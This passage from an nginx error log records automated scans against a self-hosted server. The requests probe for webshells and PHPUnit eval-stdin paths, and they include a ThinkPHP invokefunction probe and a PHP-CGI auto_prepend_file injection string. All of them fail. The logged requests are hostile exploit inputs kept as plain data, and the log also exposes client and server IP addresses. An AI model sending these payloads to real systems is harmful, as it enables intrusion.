"profibot.direct.quickconnect.to" +2026/02/01 17:09:37 [error] 288#288: *14965 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:38 [error] 288#288: *14965 open() "/var/www/html/apsarasarts/okk.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /apsarasarts/okk.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:38 [error] 288#288: *14965 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:38 [error] 288#288: *14965 open() "/var/www/html/wp-is.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-is.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:38 [error] 288#288: *14965 open() "/var/www/html/jmfi2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /jmfi2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:39 [error] 288#288: *14965 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //about/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:39 [error] 288#288: *14965 open() "/var/www/html/bnn_.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /bnn_.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:39 [error] 288#288: *14965 open() "/var/www/html/wp-content/json.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/json.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:40 [error] 288#288: *14965 open() "/var/www/html/hzz.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /hzz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:40 [error] 288#288: *14965 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //shell20211028.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:41 [error] 288#288: *14965 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:41 [error] 288#288: *14965 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:41 [error] 288#288: *14965 open() "/var/www/html/ps.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ps.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:41 [error] 288#288: *14965 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:41 [error] 288#288: *14965 "/var/www/html/.trash7309/dd/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/dd/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:42 [error] 288#288: *14965 open() "/var/www/html/cache.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /cache.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:42 [error] 288#288: *14965 open() "/var/www/html/ss.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ss.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:42 [error] 288#288: *14965 open() "/var/www/html/p.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /p.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:42 [error] 288#288: *14965 open() "/var/www/html/wp-content/plugins/achdxhv/languages/admin.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/achdxhv/languages/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:43 [error] 288#288: *14965 open() "/var/www/html/user.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //user.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:44 [error] 288#288: *14965 "/var/www/html/wp-includes/block-patterns/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:44 [error] 288#288: *14965 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:44 [error] 288#288: *14965 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:44 [error] 288#288: *14965 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:45 [error] 288#288: *14965 open() "/var/www/html/wp4.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:45 [error] 288#288: *14965 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:45 [error] 288#288: *14965 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/maint/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:45 [error] 288#288: *14965 open() "/var/www/html/asd67.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /asd67.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:46 [error] 288#288: *14965 open() "/var/www/html/sad/about.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //sad/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:46 [error] 288#288: *14965 open() "/var/www/html/oivcl.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /oivcl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:46 [error] 288#288: *14965 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:46 [error] 288#288: *14965 open() "/var/www/html/wp-content/themes/deeto/login.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/deeto/login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:47 [error] 288#288: *14965 open() "/var/www/html/v2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /v2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:47 [error] 288#288: *14965 open() "/var/www/html/wp-content/themes/hideo/network.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/hideo/network.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:47 [error] 288#288: *14965 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:48 [error] 288#288: *14965 open() "/var/www/html/.cache/x.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //.cache/x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:48 [error] 288#288: *14965 open() "/var/www/html/dr.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /dr.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:49 [error] 288#288: *14965 open() "/var/www/html/raw.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /raw.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:49 [error] 288#288: *14965 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:49 [error] 288#288: *14965 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:49 [error] 288#288: *14965 open() "/var/www/html/ioxi-o2.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:50 [error] 288#288: *14965 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:50 [error] 288#288: *14965 open() "/var/www/html/dlu.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /dlu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:50 [error] 288#288: *14965 open() "/var/www/html/wp-content/about.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //wp-content/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:51 [error] 288#288: *14965 open() "/var/www/html/db.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /db.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:51 [error] 288#288: *14965 open() "/var/www/html/packed.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /packed.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:51 [error] 288#288: *14965 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:51 [error] 288#288: *14965 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:52 [error] 288#288: *14965 open() "/var/www/html/des.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /des.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:52 [error] 288#288: *14965 open() "/var/www/html/.well-known/content.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET /.well-known/content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:09:52 [error] 288#288: *14965 open() "/var/www/html/lufix.php" failed (2: No such file or directory), client: 4.241.184.25, server: localhost-nginx-proxy-manager, request: "GET //lufix.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 17:53:10 [error] 288#288: *14979 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 17:55:47 [error] 289#289: *14982 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 19:47:33 [error] 290#290: *15024 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.65.193.78, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "78.131.122.113" +2026/02/01 19:48:13 [error] 290#290: *15027 open() "/var/www/html/cgi/conf.bin" failed (2: No such file or directory), client: 194.50.16.253, server: localhost-nginx-proxy-manager, request: "GET /cgi/conf.bin HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113:80/mainFrame.htm" +2026/02/01 21:31:36 [error] 291#291: *15060 open() "/var/www/html/System/configurationFile" failed (2: No such file or directory), client: 77.110.118.231, server: localhost-nginx-proxy-manager, request: "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1", host: "78.131.122.113" +2026/02/01 22:01:58 [error] 288#288: *15081 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:58 [error] 288#288: *15081 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:58 [error] 288#288: *15081 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:01:59 [error] 288#288: *15081 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:00 [error] 288#288: *15081 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:01 [error] 288#288: *15081 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:02 [error] 288#288: *15081 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:03 [error] 288#288: *15081 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:02:03 [error] 288#288: *15081 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 95.181.174.249, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:20:57 [error] 296#296: *15089 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 20.198.89.236, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "78-131-122-113.pool.digikabel.hu" +2026/02/01 22:20:57 [error] 296#296: *15089 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 20.198.89.236, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "78-131-122-113.pool.digikabel.hu" +2026/02/01 22:30:34 [error] 296#296: *15095 open() "/var/www/html/odinhttpcall1769985034" failed (2: No such file or directory), client: 134.209.232.120, server: localhost-nginx-proxy-manager, request: "GET /odinhttpcall1769985034 HTTP/1.1", host: "78.131.122.113" +2026/02/01 22:30:34 [error] 295#295: *15096 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 134.209.232.120, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "78.131.122.113" +2026/02/01 22:30:34 [error] 295#295: *15097 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 134.209.232.120, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "78.131.122.113" +2026/02/01 22:30:35 [error] 295#295: *15098 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 134.209.232.120, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "78.131.122.113" +2026/02/01 22:30:35 [error] 295#295: *15101 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 46.101.127.41, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:30:35 [error] 295#295: *15102 open() "/var/www/html/query" failed (2: No such file or directory), client: 165.227.162.253, server: localhost-nginx-proxy-manager, request: "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:30:35 [error] 295#295: *15104 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 167.172.110.232, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:30:35 [error] 295#295: *15105 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 167.172.177.68, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 22:30:35 [error] 295#295: *15107 